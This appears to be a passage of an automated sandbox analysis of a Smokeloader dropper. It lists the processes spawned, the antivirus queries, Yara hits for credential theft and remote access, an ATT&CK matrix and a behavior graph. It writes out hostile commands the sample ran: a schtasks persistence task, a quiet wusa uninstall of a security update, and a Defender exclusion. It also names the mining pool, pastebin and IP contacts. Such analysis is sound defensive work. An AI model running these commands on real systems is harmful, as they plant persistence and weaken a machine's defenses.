                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Thread register set: target process: 2144
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Thread register set: target process: 2836
                        Source: C:\Users\user\Desktop\25C1.exe | Process created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                        Source: C:\Users\user\Desktop\25C1.exe | Process created: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe "C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                        Source: C:\Users\user\Desktop\25C1.exe | Process created: C:\Users\user\AppData\Local\Temp\FourthX.exe "C:\Users\user\AppData\Local\Temp\FourthX.exe"
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\chcp.com chcp 1251
                        Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\user\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe
                        Source: C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | Process created: C:\Windows\explorer.exe explorer.exe
                        Source: C:\Windows\System32\svchost.exe | Process created: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe "C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -nologo -noprofile
                        Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 7692 -ip 7692
                        Source: C:\Windows\System32\svchost.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7692 -s 844
                        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart
                        Source: BroomSetup.exe, 00000005.00000000.1369842650.000000000041C000.00000020.00000001.01000000.00000009.sdmp | Binary or memory string: Shell_TrayWndSVW
                        Source: BroomSetup.exe, 00000005.00000000.1369842650.000000000041C000.00000020.00000001.01000000.00000009.sdmp | Binary or memory string: Shell_TrayWndReBarWindow32MSTaskSwWClassToolbarWindow32SVW
                        Source: C:\Users\user\Desktop\25C1.exe | Queries volume information: C:\Users\user\Desktop\25C1.exe VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                        Source: C:\Users\user\AppData\Local\Temp\InstallSetup4.exe | Code function: 3_2_00403532 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,ExitProcess,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess | 3_2_00403532
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                        Source: C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe | WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct
                        Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                        Source: C:\Windows\System32\cmd.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                        Stealing of Sensitive Information

                        Source: Yara match | File source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.2da0e67.12.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.2d70e67.11.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.3.288c47bbc1871b439df19ff4df68f076.exe.3660000.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 32.3.288c47bbc1871b439df19ff4df68f076.exe.3690000.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000020.00000002.1591528645.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000020.00000003.1494671167.0000000003AD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: 288c47bbc1871b439df19ff4df68f076.exe PID: 7692, type: MEMORYSTR

                        Remote Access Functionality

                        Source: Yara match | File source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.400000.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 32.2.288c47bbc1871b439df19ff4df68f076.exe.2da0e67.12.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.2d70e67.11.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.2.288c47bbc1871b439df19ff4df68f076.exe.400000.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 2.3.288c47bbc1871b439df19ff4df68f076.exe.3660000.7.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 32.3.288c47bbc1871b439df19ff4df68f076.exe.3690000.5.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000002.00000002.1480915326.00000000031B3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000002.00000003.1401092787.0000000003AA2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000020.00000002.1591528645.00000000031E3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000020.00000002.1587040107.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000002.00000002.1471270614.0000000000843000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000020.00000003.1494671167.0000000003AD2000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: 288c47bbc1871b439df19ff4df68f076.exe PID: 7692, type: MEMORYSTR
                        MITRE ATT&CK Matrix (techniques matched in this analysis carry the number of triggered signatures in parentheses; the remaining cells are the unmatched matrix template)

                        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                        Gather Victim Identity Information | Scripting (1) | Valid Accounts | Windows Management Instrumentation (21) | Scripting (1) | DLL Side-Loading (1) | Disable or Modify Tools (11) | OS Credential Dumping | File and Directory Discovery (2) | Remote Services | Archive Collected Data (1) | Web Service (1) | Exfiltration Over Other Network Medium | System Shutdown/Reboot (1)
                        Credentials | Domains | Default Accounts | Command and Scripting Interpreter (3) | DLL Side-Loading (1) | Access Token Manipulation (1) | Deobfuscate/Decode Files or Information (1) | LSASS Memory | System Information Discovery (15) | Remote Desktop Protocol | Clipboard Data (1) | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
                        Email Addresses | DNS Server | Domain Accounts | Scheduled Task/Job (1) | Windows Service (11) | Windows Service (11) | Obfuscated Files or Information (2) | Security Account Manager | Security Software Discovery (331) | SMB/Windows Admin Shares | Data from Network Shared Drive | Encrypted Channel (11) | Automated Exfiltration | Data Encrypted for Impact
                        Employee Names | Virtual Private Server | Local Accounts | Service Execution (1) | Scheduled Task/Job (1) | Process Injection (212) | Software Packing (2) | NTDS | Virtualization/Sandbox Evasion (151) | Distributed Component Object Model | Input Capture | Non-Standard Port (1) | Traffic Duplication | Data Destruction
                        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Scheduled Task/Job (1) | DLL Side-Loading (1) | LSA Secrets | Process Discovery (3) | SSH | Keylogging | Non-Application Layer Protocol (2) | Scheduled Transfer | Data Encrypted for Impact
                        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | File Deletion (1) | Cached Domain Credentials | Application Window Discovery (1) | VNC | GUI Input Capture | Application Layer Protocol (3) | Data Transfer Size Limits | Service Stop
                        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | Masquerading (21) | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Proxy (1) | Exfiltration Over C2 Channel | Inhibit System Recovery
                        Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Virtualization/Sandbox Evasion (151) | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                        Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | Access Token Manipulation (1) | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                        IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Process Injection (212) | Network Sniffing | Network Service Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
                        Behavior Graph ID: 1480049 | Sample: 25C1.exe | Startdate: 24/07/2024 | Architecture: WINDOWS | Score: 100

                        Text reconstruction of the behavior graph. Bracketed numbers after a process are the graph's count badges (created registry values and created files) as shown; network entries keep the graph's own "IP, port, port" notation.

                        Start (sample)
                            DNS/IP info: xmr-eu2.nanopool.org; xmr-eu1.nanopool.org (DNS related to crypt mining pools); pastebin.com (Connects to a pastebin service (likely for C&C))
                            signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 8 other signatures
                            started: 25C1.exe [5]; vueqjgslwynd.exe; svchost.exe; 3 other processes
                        25C1.exe [5]
                            dropped: C:\Users\user\AppData\...\InstallSetup4.exe (PE32); C:\Users\user\AppData\Local\...\FourthX.exe (PE32+); C:\...\288c47bbc1871b439df19ff4df68f076.exe (PE32); C:\Users\user\AppData\Local\...\25C1.exe.log (CSV)
                            started: 288c47bbc1871b439df19ff4df68f076.exe [13]; InstallSetup4.exe [1 26]; FourthX.exe [1 2]
                        vueqjgslwynd.exe
                            dropped: C:\Windows\Temp\gbfbijmbpkdw.sys (PE32+)
                            signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Injects code into the Windows Explorer (explorer.exe); 3 other signatures
                            started: explorer.exe; powershell.exe; cmd.exe; conhost.exe
                        svchost.exe
                            started: WerFault.exe
                        288c47bbc1871b439df19ff4df68f076.exe [13] (started by 25C1.exe)
                            signatures: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); 3 other signatures
                            started: 288c47bbc1871b439df19ff4df68f076.exe (second instance); powershell.exe [24]; WerFault.exe
                        InstallSetup4.exe [1 26] (started by 25C1.exe)
                            DNS/IP info: 5.42.64.33, 49715, 80 (RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU, Russian Federation); 185.172.128.109, 49713, 80 (NADYMSS-ASRU, Russian Federation); 2 other IPs or domains
                            dropped: C:\Users\user\AppData\Local\...\INetC.dll (PE32); C:\Users\user\AppData\...\BroomSetup.exe (PE32)
                            started: BroomSetup.exe [2 5]
                        FourthX.exe [1 2] (started by 25C1.exe)
                            dropped: C:\ProgramData\...\vueqjgslwynd.exe (PE32+)
                            signatures: Antivirus detection for dropped file; Adds a directory exclusion to Windows Defender
                            started: powershell.exe [23]; cmd.exe; 4 other processes
                        explorer.exe (started by vueqjgslwynd.exe)
                            DNS/IP info: pastebin.com 104.20.3.235, 443, 49708 (CLOUDFLARENETUS, United States); 51.15.58.224, 14433, 49709 (OnlineSASFR, France); 51.195.138.197, 14433, 49707 (OVHFR, France)
                            signatures: Query firmware table information (likely to detect VMs)
                        powershell.exe (started by vueqjgslwynd.exe)
                            signatures: Loading BitLocker PowerShell Module
                            started: conhost.exe
                        cmd.exe (started by vueqjgslwynd.exe)
                            started: 2 other processes
                        288c47bbc1871b439df19ff4df68f076.exe (second instance)
                            signatures: Found Tor onion address
                            started: powershell.exe
                        powershell.exe [24] (started by 288c47bbc1871b439df19ff4df68f076.exe)
                            started: conhost.exe
                        BroomSetup.exe [2 5] (started by InstallSetup4.exe)
                            signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file
                            started: cmd.exe [1]
                        powershell.exe [23] (started by FourthX.exe)
                            signatures: Loading BitLocker PowerShell Module
                            started: conhost.exe
                        cmd.exe (started by FourthX.exe)
                            started: conhost.exe; wusa.exe; conhost.exe
                        4 other processes (started by FourthX.exe)
                            started: conhost.exe; 3 other processes
                        powershell.exe (started by the second 288c47bbc1871b439df19ff4df68f076.exe instance)
                            signatures: Loading BitLocker PowerShell Module
                            started: conhost.exe
                        cmd.exe [1] (started by BroomSetup.exe)
                            signatures: Uses schtasks.exe or at.exe to add and modify task schedules
                            started: conhost.exe
  81 schtasks.exe 1 63->81         started        83 chcp.com 1 63->83         started        process15

Source | Detection | Scanner | Label
25C1.exe | 79% | ReversingLabs | ByteCode-MSIL.Trojan.Smokeloader
25C1.exe | 100% | Avira | HEUR/AGEN.1305491
25C1.exe | 100% | Joe Sandbox ML |
Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\BroomSetup.exe | 100% | Avira | TR/Drop.Agent.ojaga
C:\ProgramData\xcfonrchdkar\vueqjgslwynd.exe | 100% | Avira | TR/Kryptik.hzhfn
C:\Users\user\AppData\Local\Temp\FourthX.exe | 100% | Avira | TR/Kryptik.hzhfn
